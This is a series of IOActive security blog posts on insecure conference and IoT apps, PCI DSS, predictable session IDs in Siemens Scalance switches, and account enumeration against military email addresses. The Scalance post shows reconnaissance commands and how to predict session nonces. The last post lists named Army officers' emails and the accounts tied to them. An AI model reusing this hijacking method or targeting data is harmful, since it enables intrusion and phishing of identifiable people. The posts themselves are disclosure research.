INSIGHTS | February 27, 2014

Beware Your RSA Mobile App Download

It’s been half a decade since Apple launched their iPhone campaign titled “There’s an app for that“. In the years following, the mobile app stores (from all the major players) have continued to blossom to the point that not only are there several thousand apps that help light your way (i.e. by keeping the flash running bright), but every company, cause, group, or notable event is expected to publish their own mobile application. 
 
Today there are several hundred good “rapid development” kits that allow any newbie to craft and release their own mobile application and several thousand small professional software development teams that will create one on your behalf. These bespoke mobile applications aren’t the types products that their owners are expecting to make much (if any) money off of. Instead, these apps are generally helpful tools that appeal to a particular target audience.
 
Now, while the cynical side of me would like to point out that some people should never be trusted with tools as lofty as HTML and setting up WordPress sites–let alone building a mobile app, many corporate marketing teams I’ve dealt with have not only drunk the “There’s an app for that” Kool-Aid, they appear to bath in the stuff each night. As such, a turnkey approach to app production is destined to involve many sacrifices and, at the top of the sacrificial pillar, data security and integrity continue to reign supreme.
 
A few weeks ago I noticed that, in the run up to the RSA USA 2014 conference, a new mobile application was conceived and thrust upon the Apple and Google app stores and electronically marketed to the world at large. Maybe it was a reaction to being spammed with a never-ending tirade of “come see us at RSA” emails, or it was topical off the back of a recent blog on the state of mobile banking application security, or maybe both. I asked some of the IOActive consulting team who had a little bench-time between jobs to have a poke at freshly minted “RSA Conference 2014” mobile application. 
 
 
 
The Google Play app store describes the RSA Conference 2014 application like this:
With the RSA Conference Mobile App, you can stay connected with all Conference activities, view the event catalog, manage session schedules and engage with colleagues and peers while onsite using our social and professional networking tools. You’ll have access to dynamic agenda updates, venue maps, exhibitor listing and more!
Now, I wasn’t expecting the application to be particularly interesting–it’s not as if it was a transactional banking application etc.–but I would have thought that RSA (or whoever they tasked with commissioning the application) would have at least applied some basic elbow grease so as to not potentially embarrass themselves. Alas, that was not to be the case.
 
The team came back rather quickly with a half-dozen security issues. Technically the highest impact vulnerability had to do with the app being vulnerable to man-in-the-middle attacks, where an attacker could inject additional code into the login sequence and phish credentials. If we were dealing with a banking application, then heads would have been rolling in an engineering department, but this particular app has only been downloaded a few thousand times, and I seriously doubt that some evil hacker is going to take the time out of their day to target this one application (out of tens-of-millions) to try phish credentials to a conference.
 
It was the second most severe vulnerability that caught my eye though. The RSA Conference 2014 application downloads a SQLite DB file that is used to populate the visual portions of the app (such as schedules and speaker information) but, for some bizarre reason, it also contains information of every registered user of the application–including their name, surname, title, employer, and nationality.
 
 
 
I have no idea why the app developers chose to do that, but I’m pretty sure that the folks who downloaded and installed the application are unlikely to have thought that their details were being made public and published in this way. Marketers love this kind of information though!
 
Some readers may think I’m targeting RSA, and in a small way I guess I am. Security flaws in mobile applications (particularly these rapidly developed and targeted apps) are endemic, and I think the RSA example helps prove the point that there are often inherent risks in even the most benign applications.
 
I’m betting that RSA didn’t even create the application themselves. The Google Play store indicates that a company called QuickMobile was the developer. With one small click it’s possible to get a list of all the other applications QuickMobile have created for what I would assume to be on their clients behalf.
 
 
 
As you can see from above, there are lots of popular brands and industry conferences employing their app creation services. I wonder if many of them share the same vulnerabilities as the RSA Conference 2014 application?
 
Here’s a little bit of advice to any corporate marketing team. If you’re going to release your own mobile application, the security and integrity of that application are your responsibility. While you can’t outsource that, you can get another organization to assess the application on your behalf.
 
In the meantime, readers of this blog may want to refrain from downloading the RSA Conference 2014 (and related) mobile applications–unless you’re a hacker or marketing team that wants to acquire a free list of conference attendees names, positions, and employers.
INSIGHTS | February 19, 2014

PCI DSS and Security Breaches

Every time an organization suffers a security breach and cardholder data is compromised, people question the effectiveness of the Payment Card Industry Data Security Standard (PCI DSS). Blaming PCI DSS for the handful of companies that are breached every year shows a lack of understanding of the standard’s role. 
Two major misconceptions are responsible for this.
 
First, PCI DSS is a compliance standard. An organization can be compliant today and not tomorrow. It can be compliant when an assessment is taking place and noncompliant the minute the assessment is completed.
Unfortunately, some organizations don’t see PCI DSS as a standard that applies to their day-to-day operations; they think of it as a single event that they must pass at all costs. Each year, they desperately prepare for their assessment and struggle to remediate the assessor’s findings before their annual deadline. When they finally receive their attestation, they check out and don’t think about PCI DSS compliance until next year, when the whole process starts again. 
 
Their information security management system is immature, ad-hoc, perhaps even chaotic, and driven by the threat of losing a certificate or being fined by their processor.
 
To use an analogy, PCI DSS compliance is not a race to a destination, but how consistently well you drive to that destination. Many organizations accelerate from zero to sixty in seconds, braking abruptly, and starting all over again a month later. The number of security breaches will be reduced as soon as organizations and assessors both understand that a successful compliance program is not a single state, but an ongoing process. As such, an organization that has a mature and repeatable process will be compliant continuously with rare exceptions and not only during the time of the assessment.
 
Second, in the age of Advanced Persistent Threats (APTs), the challenge for most organizations it is not whether they can successfully prevent an attack from ever occurring, but how quickly they can become aware that a breach has actually occurred.
 
PCI DSS requirements can be classified into three categories:  
 
1. Requirements intended to prevent an incident from happening in the first place. 
These requirements include implementing network access controls, configuring systems securely, applying periodic security updates, performing periodic security reviews, developing secure applications, providing security awareness to the staff, and so on. 
 

2. Requirements designed to detect malicious activities.
These requirements involve implementing solutions such as antivirus software, intrusion detection systems, and file integrity monitoring.


3. Requirements designed to ensure that if a security breach occurs, actions are taken to respond to and contain the security breach, and ensure evidence will exist to identify and prosecute the attackers.

 
Too many organizations focus their compliance resources on the first group of requirements. They give the second and third groups as little attention as possible. 
 
This is painfully obvious. According to the Verizon Data Breach Investigation Report (DBIR) and public information available for the most recent company breaches, most organizations become aware of a security breach many weeks or even months after the initial compromise, and only when notified by the payment card brands or law enforcement. This confirms a clear reality. Breached organizations do not have the proper tools and/or qualified staff to monitor their security events and logs. 
 
Once all the preventive and detective security controls required by PCI DSS have been properly implemented, the only thing left for an organization is to thoroughly monitor logs and events. The goal is to detect anomalies and take any necessary actions as soon as possible.
 
Having sharp individuals in this role is critical for any organization. The smarter the individuals doing the monitoring are, the less opportunity attackers have to get to your data before they are discovered. 
 
You cannot avoid getting hacked. Sooner or later, to a greater or lesser degree, it will happen. What you can really do is monitor and investigate continuously.
 

 

In PCI DSS compliance, monitoring is where companies are really failing.
INSIGHTS | February 17, 2014

INTERNET-of-THREATS

At IOActive Labs, I have the privilege of being part of a great team with some of the world’s best hackers. I also have access to really cool research on different technologies that uncovers security problems affecting widely used hardware and software. This gives me a solid understanding of the state of security for many different software and hardware devices, not just opinions based on theories and real life experience.
 
Currently, the term Internet-of-Things (IoT) is becoming a buzzword used in the media, announcements from hardware device manufacturers, etc. Basically, it’s used to describe an Internet with everything connected to it. It describes what we are seeing nowadays, including:
  • Laptops, tablets, smartphones, set-top boxes, media-streaming devices, and data-storage devices
  • Watches, glasses, and clothes
  • Home appliances, home switches, home alarm systems, home cameras, and light bulbs
  • Industrial devices and industrial control systems
  • Cars, buses, trains, planes, and ships
  • Medical devices and health systems
  • Traffic sensors, seismic sensors, pollution sensors, and weather sensors
     …and more; you name it, and it is or soon will be connected to the Internet.
 
While the devices and systems connected to the Internet are different, they have something in common–most of them suffer from serious security vulnerabilities. This is not a guess. It is based on IOActive Labs’ security research into many of these types of devices currently being used worldwide. Sadly, we are seeing almost the exact same vulnerabilities on these devices that have plagued software vendors over the last decade. Vulnerabilities that the most important software vendors are trying hard to eradicate. It seems that many hardware companies are following really poor security practices when adding software to their products and connecting them to the Internet. What is worse is that sometimes vendors don’t even respond to security vulnerability reports or just downplay the threat and don’t fix the vulnerabilities. Many vendors don’t even know how to properly deal with the security vulnerabilities being reported.
 
Some of common vulnerabilities IOActive Labs finds include:
  • Sensitive data sent over insecure channels
  • Improper use of encryption
    • No SSL certificate validation
    • Things like encryption keys and signing certificates easily available to anyone
  • Hardcoded credentials/backdoor accounts
  • Lack of authentication and/or authorization
  • Storage of sensitive data in clear text
  • Unauthenticated and/or unauthorized firmware updates
  • Lack of firmware integrity check during updates
  • Use of insecure custom made protocols
Also, data ambition is working against vendors and is increasing attack surfaces considerably. For example, all data collected is sent to “vendor cloud” and device commands are sent from “vendor cloud”, instead of just allowing users to connect directly to and command their devices. Hacking into “vendor cloud” = thousands of devices compromised = lots of lost money.
 
Why should we worry about all of this? Well, these devices affect our everyday life and will continue to do so more and more. We’ve only seen the tip of the iceberg when it comes to the attacks that people, companies, and governments face and how easily they can be performed. If the situation doesn’t change soon, it is just matter of time before we witness attacks with tragic consequences.
 
If a headline like “+100K Digital Toilets from XYZ1.3 Inc. Found Sending Spam and Distributing Malware” doesn’t scare you because you think it’s funny and improbable, you could be wrong. We shouldn’t wait for headlines such as “Dozens of People Injured When Home Automation Devices Hacked” before we react.
 
Something must be done! From enforcing secure practices during product development to imposing high fines when products are hacked, action must be taken to prevent the loss of money and possibly even lives.
 
Companies should strongly consider:
    • Training developers on secure development
    • Implementing security development practices to improve software security
    • Training company staff on security best practices
    • Implementing a security patch development and distribution process
    • Performing product design/architecture security reviews
    • Performing source code security audits
    • Performing product penetration tests
    • Performing company network penetration tests
    • Staying up-to-date with new security threats
    • Creating a bug bounty program to reward reported vulnerabilities and clearly defining how vulnerabilities should be reported
    • Implementing a security incident/emergency response team
It is difficult to give advice to end users given that the best solution is just not to buy or use many products because they are insecure by design. At this stage, it’s just matter of being lucky and hoping that you won’t be hacked. Maybe opportunistic vendors could come up with some novel solution such as an IPS/anti* device that will protect all of your devices from attacks. Just pray that the protection device itself is not vulnerable.
 
Sometimes end users are forced to live with insecure devices since there isn’t any way to turn them off or not to use them. These include devices provided by TV cable companies, electricity and gas companies, public services companies, governments, etc. These companies and the government should take responsibility for deploying secure products.
 
This is not BS–in a couple of days we will be releasing some of the extensive research I mentioned and on which this blog post is based.
 
I intend for this post to be a wakeup call for everyone! I’m really concerned about the current situation. In the meantime, I will use the term INTERNET-of-THREATS (not Internet-of-Things). Maybe this new buzzword will make us more conscious of the situation. If it doesn’t, then at least I have tried.
INSIGHTS | February 14, 2014

The password is irrelevant too

In this follow up to a blog post on the Scalance-X200 series switches, we look at an authentication bypass vulnerability. It isn’t particularly complicated, but it does allow us to download configuration files, log files, and a firmware image. It can also be used to upload configuration and firmware images, which causes the device to reboot.
 
The code can be found in IOActive Labs github repository.
 
If an attacker has access to a configuration file with a known password, they can use this code to update the configuration file and take over the switch’s management functions. It can also be used to mirror ports and enable or disable other services, such as telnet, SSH, or SNMP. Lastly, the same script can be used to upload a firmware image to the device sans authentication. In other words, it is *delightfully reprogrammable* until you install the patch.
 
 
This brings us to an interesting point. I asked Siemens if the SSH keys in Firmware V5.X (the fixed version) are unique per device, and I was assured that they are. If this is true, there should be no problem with me publishing a hash of the private key for my device. Don’t worry damsels and chaps, I can always patch my device with a new key later, as a demonstration of my enthusiasm for firmware. 
 
Anyway, here are two fingerprints of the private SSH key: 
 
MD5   6f09a4d77569236fd90483a85920912d
SHA256    505166f90ee05761b11a5feda24d0ccdc53ef902cdd617b330db3634cc2788f7
 
If you have one of these devices and have patched to the version that contains fixes, you could assist the community greatly by verifying that the key gets a different finger-print. This will independently confirm what those outstanding gentry at Siemens told me and promote confidence in their security solutions.
 
This neatly segues into some changes we’ve seen in the ICS-space over the last few years. 
 
The primary change in behavior I’d like to applaud is how companies are striving to develop better relationships with independent security researchers such as myself. The increase in constructive dialogue is evidenced by Siemen’s ability to receive notification and then produce a patch within three months. Years ago we were regularly waiting six months to two years for fixes.
 
In fact, I challenged vendors at S4x14 to commit to an AVERAGE TIME of security patching for externally supplied vulnerabilities. We purposefully chose the average time for this challenge, because we know that providing quality assurance for these systems is difficult and can be time consuming. After all, some bugs are just thornier than others
 
Incidentally, this is backed up by empirical research shared with me by the inimitable Sean McBride during our conversations at S4x14. I wouldn’t want you to think I am just some un-gentlemanly shuffler or simkin, challenging hecatonchires for the sport of it (hat-tip @sergeybratus).
 
Follow @digitalbond to see the response I got to committing to an average security patch time, when my ”Red/Blue Live” talk goes online. You’ll also notice that my two attackers (red team) did not manage to use the script to take over the device, despite doing so in practice sessions the night before. The ingenious Rotem Bar (blue team) demonstrated that the secret of ICS security is to simply *patch*. Apparently, it is not only possible, but effective!
…and btw, happy Valentine’s!
INSIGHTS | February 6, 2014

An Equity Investor’s Due Diligence

Information technology companies constitute the core of many investment portfolios nowadays. With so many new startups popping up and some highly visible IPO’s and acquisitions by public companies egging things on, many investors are clamoring for a piece of the action and looking for new ways to rapidly qualify or disqualify an investment ; particularly so when it comes to hottest of hot investment areas – information security companies. 

Over the years I’ve found myself working with a number of private equity investment firms – helping them to review the technical merits and implications of products being brought to the market by new security startups. In most case’s it’s not until the B or C investment rounds that the money being sought by the fledgling company starts to get serious to the investors I know. If you’re going to be handing over money in the five to twenty million dollar range, you’re going to want to do your homework on both the company and the product opportunity. 

Over the last few years I’ve noted that a sizable number of private equity investment firms have built in to their portfolio review the kind of technical due diligence traditionally associated with the formal acquisition processes of Fortune-500 technology companies. It would seem to me that the $20,000 to $50,000 price tag for a quick-turnaround technical due diligence report is proving to be valuable investment in a somewhat larger investment strategy. 

When it comes to performing the technical due diligence on a startup (whether it’s a security or social media company for example), the process tends to require a mix of technical review and tapping past experiences if it’s to be useful, let alone actionable, to the potential investor. Here are some of the due diligence phases I recommend, and why:

    1. Vocabulary Distillation – For some peculiar reason new companies go out of their way to invent their own vocabulary as descriptors of their value proposition, or they go to great lengths to disguise the underlying processes of their technology with what can best be described as word-soup. For example, a “next-generation big-data derived heuristic determination engine” can more than adequately be summed up as “signature-based detection”. Apparently using the word “signature” in your technology description is frowned upon and the product management folks avoid the use the word (however applicable it may be). Distilling the word soup is a key component of being able to compare apples with apples.
    1. Overlapping Technology Review – Everyone wants to portray their technology as unique, ground-breaking, or next generation. Unfortunately, when it comes to the world of security, next year’s technology is almost certainly a progression of the last decade’s worth of invention. This isn’t necessarily bad, but it is important to determine the DNA and hereditary path of the “new” technology (and subcomponents of the product the start-up is bringing to market). Being able to filter through the word-soup of the first phase and determine whether the start-up’s approach duplicates functionality from IDS, AV, DLP, NAC, etc. is critical. I’ve found that many start-ups position their technology (i.e. advancements) against antiquated and idealized versions of these prior technologies. For example, simplifying desktop antivirus products down to signature engines – while neglecting things such as heuristic engines, local-host virtualized sandboxes, and dynamic cloud analysis.
    1. Code Language Review – It’s important to look at the languages that have been employed by the company in the development of their product. Popular rapid prototyping technologies like Ruby on Rails or Python are likely acceptable for back-end systems (as employed within a private cloud), but are potential deal killers to future acquirer companies that’ll want to integrate the technology with their own existing product portfolio (i.e. they’re not going to want to rewrite the product). Similarly, a C or C++ implementation may not offer the flexibility needed for rapid evolution or integration in to scalable public cloud platforms. Knowing which development technology has been used where and for what purpose can rapidly qualify or disqualify the strength of the company’s product management and engineering teams – and help orientate an investor on future acquisition or IPO paths.
    1. Security Code Review – Depending upon the size of the application and the due diligence period allowed, a partial code review can yield insight in to a number of increasingly critical areas – such as the stability and scalability of the code base (and consequently the maturity of the development processes and engineering team), the number and nature of vulnerabilities (i.e. security flaws that could derail the company publicly), and the effort required to integrate the product or proprietary technology with existing major platforms.
    1. Does it do what it says on the tin? – I hate to say it, but there’s a lot of snake oil being peddled nowadays. This is especially so for new enterprise protection technologies. In a nut-shell, this phase focuses on the claims being made by the marketing literature and product management teams, and tests both the viability and technical merits of each of them. Test harnesses are usually created to monitor how well the technology performs in the face of real threats – ranging from the samples provided by the companies user acceptance team (UAT) (i.e. the stuff they guarantee they can do), through to common hacking tools and tactics, and on to a skilled adversary with key domain knowledge.
  1. Product Penetration Test – Conducting a detailed penetration test against the start-up’s technology, product, or service delivery platform is always thoroughly recommended. These tests tend to unveil important information about the lifecycle-maturity of the product and the potential exposure to negative media attention due to exploitable flaws. This is particularly important to consumer-focused products and services because they are the most likely to be uncovered and exposed by external security researchers and hackers, and any public exploitation can easily set-back the start-up a year or more in brand equity alone. For enterprise products (e.g. appliances and cloud services) the hacker threat is different; the focus should be more upon what vulnerabilities could be introduced in to the customers environment and how much effort would be required to re-engineer the product to meet security standards.


Obviously there’s a lot of variety in the technical capabilities of the various private equity investment firms (and private investors). Some have people capable of sifting through the marketing hype and can discern the actual intellectual property powering the start-ups technology – but many do not. Regardless, in working with these investment firms and performing the technical due diligence on their potential investments, I’ve yet to encounter a situation where they didn’t “win” in some way or other. A particular favorite of mine is when, following a code review and penetration test that unveiled numerous serious vulnerabilities, the private equity firm was still intent on investing with the start-up but was able use the report to negotiate much better buy-in terms with the existing investors – gaining a larger percentage of the start-up for the same amount.

INSIGHTS | January 13, 2014

The password is irrelevant

This story begins with a few merry and good hearted tweets from S4x13. These tweets in fact:
 
 
Notice the shared conviviality, and the jolly manner in which this discussion of vulnerabilities occurs.
 
It is with this same lightness in my heart that I thought I would explore the mysterious world of the.

 
So I waxed my moustache, rolled up my sleeves, and began to use the arcane powers of Quality Assurance. 
 
Ok, how would an attacker who doesn’t have default credentials or a device to test on go about investigating one of these remotely? Why, find one on Shodan of course!
 
 
Personally, I buy mine second hand from eBay with the fortune I inherited from my grandfather’s moustache wax empire.
 
The first thing an attacker would normally do is scan the device to get familiar with the ports and services. A quick nmap looks like this:
 
Nmap scan report for Unknown (192.168.0.5)
Host is up (0.0043s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 4.2 (protocol 2.0)
|_ssh-hostkey: 1024 cd:b4:33:49:62:3b:58:1a:67:5a:a3:f0:50:00:71:86 (RSA)
23/tcp  open  telnet?
80/tcp  open  http     WindWeb 4.00
|_http-methods: No Allow or Public header in OPTIONS response (status
code 501)
|_http-title: Logon to SCALANCE X Management (192.168.0.5)
84/tcp  open  ctf?
111/tcp open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|_  100000  2            111/udp  rpcbind
443/tcp open  ssl/http WindWeb 4.00
|_http-methods: No Allow or Public header in OPTIONS response (status
code 501)
|_http-title: Logon to SCALANCE X Management (192.168.0.5)
| ssl-cert: Subject: organizationName=Siemens
AG/stateOrProvinceName=BW/countryName=DE
| Not valid before: 2008-02-04T14:05:57+00:00
|_Not valid after:  2038-01-18T14:05:57+00:00
|_ssl-date: 1970-01-01T00:14:20+00:00; -43y254d14h08m05s from local time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
MAC Address: 00:0E:8C:A3:4E:CF (Siemens AG A&D ET)
Device type: general purpose
Running: Wind River VxWorks
OS CPE: cpe:/o:windriver:vxworks
OS details: VxWorks
Network Distance: 1 hop
 
So we have a variety of management interfaces to choose from: Telnet (really in 2014?!?), SSH, HTTP, and HTTPS. All of these interfaces share the same users and default passwords you would expect, but we are looking for something more meaningful. 
 
Now that we’ve found them on Shodan (wait, they’re all air-gapped, right?), we quickly learn from the web interface that there are only two users: admin and user. Next we view the web page source and search for “password” which gives us this lovely snippet:
 
document.submitForm.encoded.value = document.logonForm.username.value + “:” + md5(document.logonForm.username.value + “:” + document.logonForm.password.value + “:” + document.submitForm.nonceA.value)
 
 
This is equivalent to the following command on Linux:
 
echo -n “admin:admin:C0A8006500005F31” | md5sum
 
 
Which is then posted to the device in a form such as this (although this one has a different password*):
 
encoded=admin%3Aafc0dc177659c8e9d72dec8a3c68650e&nonceA=C0A800610000CE29
 
Setting aside just how weak the use of MD5 is (and in fact I have written a script to brute-force credentials snatched off the wire), that nonceA value is very important. A nonce is a ‘number used once’, which is typically used to prevent cryptographic replay attacks. In other words, this random challenge value is provided by the server, to keep an attacker from simply capturing the hash on the wire and replaying it to the server later when they want to login. This nonce then, deserves our attention.
 
It appears that this is an ID field in the cookie, and that it is also the session ID. If I can predict session Ids, I can perform session hijacking while someone is managing the switch. So we set about estimating the entropy of this session ID, which initially appears to be 16 hex values. However, we won’t even need to create an equation since it turns out to be COMPLETELY predictable, as you will soon see. 
 
We can use WGET to fetch the page a few times and get a small sample of these nonceA values. This is what we see:
 
C0A8006500005F31,C0A8006500001A21,C0A8006500000960,C0A80065000049A6
 
This seems distinctly non-random. In fact, when I measured it more precisely, it became clear that it was sequential! A little further investigation revealed that SNMP is sometimes available to us. So we use snmpwalk on one of the devices I have at home:
 
snmpwalk -Os -c public -v 1 192.168.0.5
iso.3.6.1.2.1.1.1.0 = STRING: “Siemens, SIMATIC NET, SCALANCE X204-2,
6GK5 204-2BB10-2AA3, HW: 4, FW: V4.03″
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.4196.1.1.5.2.22
iso.3.6.1.2.1.1.3.0 = Timeticks: (471614) 1:18:36.14
 
Well look at that! 
 
47164 in base 10 = 7323E in hex! I wonder if the session ID is simply uptime in hex?
 
We do a WGET at approximately the same time and get this as a session ID:
 
C0A800610007323F
 
So if we assume the last 8 hex chars are uptime in hex (or at least close enough for us to brute-force the few values around it), then where do the first 8 hex come from? 
 
I initially imagined they were unique for each device and set out to test that theory by getting a session ID from another device found on Shodan. Keep in mind I did not attempt a login, I just fetched the page to see what the session ID was. Sure enough it was different, but the one from the switch I have wasn’t the MAC address or any other unique identifier on the switch. I spent a week missing the point here, but luckily I have excellent company at IOActive Labs. 
 
It was during discussions with my esteemed colleague Reid Wightman, he suggested it was an IP address. He pointed out the C0 and A8 are 192 168 in decimal. So I went and checked the IP address of the switch I have, and it was not 192.168.0.97. So again I was stumped until I realized it was the IP address of my own client machine!
 
In other words, the nonceA was simply the address of the web client (converted to hex) connecting to the switch, concatenated to the uptime of the switch (in hex). I can practically see the developer who thought this would be a good idea. I can hear them thinking that each session is clearly distinguished by the address it is connecting from, and made impossible to brute-force with time. Time+Space, that’s too large to brute-force or estimate right? You must admit, it has a kind of perverse logic to it. Unfortunately, it is highly predictable and insecure.
 
Go home Scalance X200 family session IDs, you’re drunk. Aside from being completely predictable, they are too small. 32 hex is a far cry from using the 128 bits recommended by OWASP.
 
I guess that’s what they refer to in this announcement with the phrases “A potential vulnerability” and “that might allow attackers to hijack web sessions over the network without authentication”. 
 
There are a few more vulnerabilities to discuss about this switch, but to learn about those, you’ll have to see me at S4x14, or wait for the next blog post where I release a more reliable POC.
 
Usually I am one to organise a nice quiet coordinated disclosure, probably over a lavender scone and a cup of tea. I do my best to be polite, cheerful, and helpful, though I am under no obligation to do so, and there are considerable financial incentives for a researcher to never report a vulnerability at all
 
Siemens product CERT should be commended for being polite and helpful, and relatively quick with this fix. They acknowledged my work, and communicated clear timelines of when to expect a fix. This is precisely how they should go about communicating with us in the research community. It was at this point that I informed the good folks over at Siemens that I would verify the patch on Sep 12th. On the morning of the 12th, I tried to login to verify they patch they had provided, and found myself blocked from doing so. 
 
 
Should a firmware release with security implications only be downloadable in a forum that requires vetting and manual processing? Is it acceptable to end users that security patches are under export restriction?
 
Luckily these bans were lifted later that day and I was able to confirm the fixes. I would like to commend Siemens Product CERT the team for fixing these issues rapidly and with great professionalism. They communicated with me securely using GPG encrypted emails, set realistic timelines, and gave me feedback when those timelines didn’t work out. This leads me to a formal challenge based on their performance.
 
I challenge any other ICS vendors to match Siemens laudable response times and produce patches within 3 months for any externally submitted security vulnerabilities.
 
Stay tuned for part 2 where we release the simple Python script for authentication bypass which allows firmware and configuration upload and download.
 
*If you can crack this, and are interested in a job, please send IOActive your CV and the cleartext password used to create that credential. It is not hard, but it might take you a while….
INSIGHTS | December 4, 2013

Practical and cheap cyberwar (cyber-warfare): Part II

Disclaimer: I did not perform any illegal attacks on the mentioned websites in order to get the information I present here. No vulnerability was exploited on the websites, and they are not known to be vulnerable.
 
Given that we live in an age of information leakage where government surveillance and espionage abound, I decided in this second part to focus on a simple technique for information gathering on human targets. If an attacker is targeting a specific country, members of the military and defense contractors would make good human targets. When targeting members of the military, an attacker would probably focus on high ranking officers and for defense contractors, an attacker would focus on key decision makers, C-level executives, etc. Why? Because if an attacker compromises these people, they could gain access to valuable information related to their work, their personal life, and family. Data related to their work could help an attacker strategically by enabling them to build better defenses, steal intellectual property, and craft specific attacks. Data related to a target’s personal life could help attackers for blackmailing or attacking the target’s families.
 
 
There is no need to work for the NSA and have a huge budget in order to get juicy information. Everything is just one click away; attackers only need to find ways to easily milk the web. One easy way to gather information about people is to get their email addresses as I have described last year here http://blog.ioactive.com/2012/08/the-leaky-web-owning-your-favorite-ceos.html . Basically you use a website registration form and/or forgotten password functionality to find out if an email address is already registered on a website. With a list of email addresses attackers can easily enumerate the websites/services where people have accounts. Given the ever-increasing number of online accounts one person usually has, this could provide a lot of useful information. For instance, it could make perform phishing attacks and social engineering easier (see http://www.infosecurity-magazine.com/view/35048/hackers-target-mandiant-ceo-via-limo-service/). Also, if one of the sites where the target has an account is vulnerable, that website could be hacked in order to get the target’s account password. Due to password reuse, attackers can compromise all the target accounts most of the time. 
 
 
This is intended to be easy and practical, so let’s get hands on. I did this research about a year ago. First, I looked for US Army email addresses. After some Google.com searches, I ended up with some PDF files with a lot of information about military people and defense contractors:

I extracted some emails and made a list. I ended up with:
 
1784 total email addresses: military (active and retired), civilians, and defense contractors.
 
I could have gotten more email addresses, but that was enough for testing purposes. I wasn’t planning on doing a real attack.
 
I had a very simple (about 50 LoC or so) Python tool (thanks to my colleague Ariel Sanchez for quickly building original tool!) that can be fed a list of websites and email addresses. I had already built the website database with 20 or so common and well known websites (I should have used military related ones too for better results, but it still worked well), I loaded the list of email addresses I had found, and then ran the tool. A few minutes later I ended up with a long list of email addresses and the websites where those email addresses were used (meaning where the owners of those email addresses have accounts):
 
Site
Accounts
     %
Facebook
  308
17.26457
Google
  229
12.83632
Orbitz
  182
10.20179
WashingtonPost
  149
8.352018
Twitter 
  108
6.053812
Plaxo
  93
5.213004
LinkedIn
  65
3.643498
Garmin
  45
2.522422
MySpace
  44
2.466368
Dropbox
  44
2.466368
NYTimes
  36
2.017937
NikePlus
  23
1.289238
Skype
  16
0.896861
Hulu
  13
0.7287
Economist
  11
0.616592
Sony Entertainment Network
  9
0.504484
Ask
  3
0.168161
Gartner
  3
0.168161
Travelers
  2
0.112108
Naymz
  2
0.112108
Posterous
  1
0.056054
 
Interesting to find accounts on Sony Entertainment Network website, who says the military can’t play Playstation 🙂
 
I decided that I should focus on something juicier, not just random .mil email addresses. So, I did a little research about high ranking US Army officers, and as usual, Google and Wikipedia ended up being very useful.
 
Let’s start with US Army Generals. Since this was done in 2012, some of them could be retired now.

 
I found some retired ones that now may be working for defense contractors and trusted advisors:

 
Active US Army Generals seem not to use their .mil email addresses on common websites; however, we can see a pattern that almost all of them use orbitz.com. For retired ones, since we got the personal (not .mil) email addresses, we can see they use them on many websites.

After US Army Generals, I looked at Lieutenant Generals (we could say future Generals):

Maybe because they are younger they seem to use their .mil email address in several common websites including Facebook.com. Even more, they have most of their Facebook information available to public! I was thinking about publishing the related Facebook information, but I will leave it up to you to explore their Facebook profiles.
 


I also looked for US Army Mayor Generals and found at least 15 of them:
 
Robert Abrams
Email: robert.abrams@us.army.mil
 
 
 
Found account on site: orbitz.com
 
Found account on site: washingtonpost.com
 
 
Jamos Boozer
Email: james.boozer@us.army.mil
 
 
 
Found account on site: orbitz.com
 
Found account on site: facebook.com
 
 
Vincent Brooks
Email: vincent.brooks@us.army.mil
 
 
 
Found account on site: facebook.com
 
Found account on site: linkedin.com
 
 
James Eggleton
Email: james.eggleton@us.army.mil
 
 
 
Found account on site: plaxox.com
 
 
Reuben Jones
Email: reuben.jones@us.army.mil
 
 
 
Found account on site: plaxo.com
 
Found account on site: washingtonpost.com
 
 
 
 
David quantock
Email: david-quantock@us.army.mil
 
 
 
Found account on site: twitter.com
 
Found account on site: orbitz.com
 
Found account on site: plaxo.com
 
 
 
 
Dave Halverson
Email: dave.halverson@conus.army.mil
 
 
 
Found account on site: linkedin.com
 
 
Jo Bourque
Email: jo.bourque@us.army.mil
 
 
 
Found account on site: washingtonpost.com
 
 
 
 
Kev Leonard
Email: kev-leonard@us.army.mil
 
 
 
Found account on site: facebook.com
 
 
James Rogers
Email: james.rogers@us.army.mil
 
 
 
Found account on site: plaxo.com
 
 
 
 
William Crosby
Email: william.crosby@us.army.mil
 
 
 
Found account on site: linkedin.com
 
 
Anthony Cucolo
Email: anthony.cucolo@us.army.mil
 
 
 
Found account on site: twitter.com
 
Found account on site: orbitz.com
 
Found account on site: skype.com
 
Found account on site: plaxo.com
 
Found account on site: washingtonpost.com
 
Found account on site: linkedin.com
 
 
Genaro Dellrocco
Email: genaro.dellarocco@msl.army.mil
 
 
 
Found account on site: linkedin.com
 
 
Stephen Lanza
Email: stephen.lanza@us.army.mil
 
 
 
Found account on site: skype.com
 
Found account on site: plaxo.com
 
Found account on site: nytimes.com
 
 
Kurt Stein
Email: kurt-stein@us.army.mil
 
 
 
Found account on site: orbitz.com
 
Found account on site: skype.com
 
 
Later I found about 7 US Army Brigadier General and 120 US Army Colonel email addresses, but I didn’t have time to properly filter the results. These email addresses were associated with many website accounts.
 
Basically, the 1784 total email addresses included a broad list of ranking officers from the US Army.
 
Doing a quick analysis of the gathered information we could infer: 
  • Many have Facebook accounts exposing to public the family and friend relations that could be targeted by attackers. 
  • Most of them read and are probably subscribed to The Washington Post (makes sense, no?). This could be an interesting avenue for attacks such as phishing and watering hole attacks. 
  • Many of them use orbitz.com, probably for car rentals. Hacking this site can give attackers a lot of information about how they move, when they travel, etc. 
  • Many of them have accounts on google.com probably meaning they have Android devices (Smartphones, tablets, etc.).This could allow attackers to compromise the devices remotely (by email for instance) with known or 0days exploits since these devices are not usually patched and not very secure.
  • And last but not least, many of them including Generals use garmin.com or nikeplus.com. Those websites are related with GPS devices including running watches. These websites allow you to upload GPS information making them very valuable for attackers for tracking purposes. They could know on what area a person usually runs, travel, etc.

 

 
